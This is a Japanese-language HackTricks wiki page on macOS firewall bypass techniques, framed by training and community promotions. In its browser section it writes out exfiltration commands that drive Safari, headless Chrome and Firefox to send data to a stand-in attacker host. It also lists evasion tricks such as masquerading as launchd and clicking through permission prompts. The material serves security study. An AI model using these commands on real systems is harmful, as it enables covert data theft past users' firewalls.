macOS ファイアウォールのバイパス
Reading time: 4 minutes
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
発見された技術
以下の技術は、いくつかの macOS ファイアウォールアプリで動作することが確認されました。
ホワイトリスト名の悪用
- 例えば、
launchd
のようなよく知られた macOS プロセスの名前でマルウェアを呼び出すこと。
合成クリック
- ファイアウォールがユーザーに許可を求める場合、マルウェアに 許可をクリックさせる。
Apple 署名のバイナリを使用
curl
のようなもの、他にもwhois
など。
よく知られた Apple ドメイン
ファイアウォールは、apple.com
や icloud.com
のようなよく知られた Apple ドメインへの接続を許可している可能性があります。そして、iCloud は C2 として使用される可能性があります。
一般的なバイパス
ファイアウォールをバイパスするためのいくつかのアイデア。
許可されたトラフィックの確認
許可されたトラフィックを知ることで、潜在的にホワイトリストに登録されたドメインや、どのアプリケーションがそれらにアクセスできるかを特定するのに役立ちます。
lsof -i TCP -sTCP:ESTABLISHED
DNSの悪用
DNS解決は、DNSサーバーに接続することが許可されている可能性が高い**mdnsreponder
**署名アプリケーションを介して行われます。
.png)
ブラウザアプリを介して
- oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- グーグルクローム
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
- ファイアフォックス
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- サファリ
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
プロセスインジェクションを介して
接続を許可されたプロセスにコードを注入できれば、ファイアウォールの保護を回避できます:
参考文献
tip
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Azureハッキングを学び、実践する:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。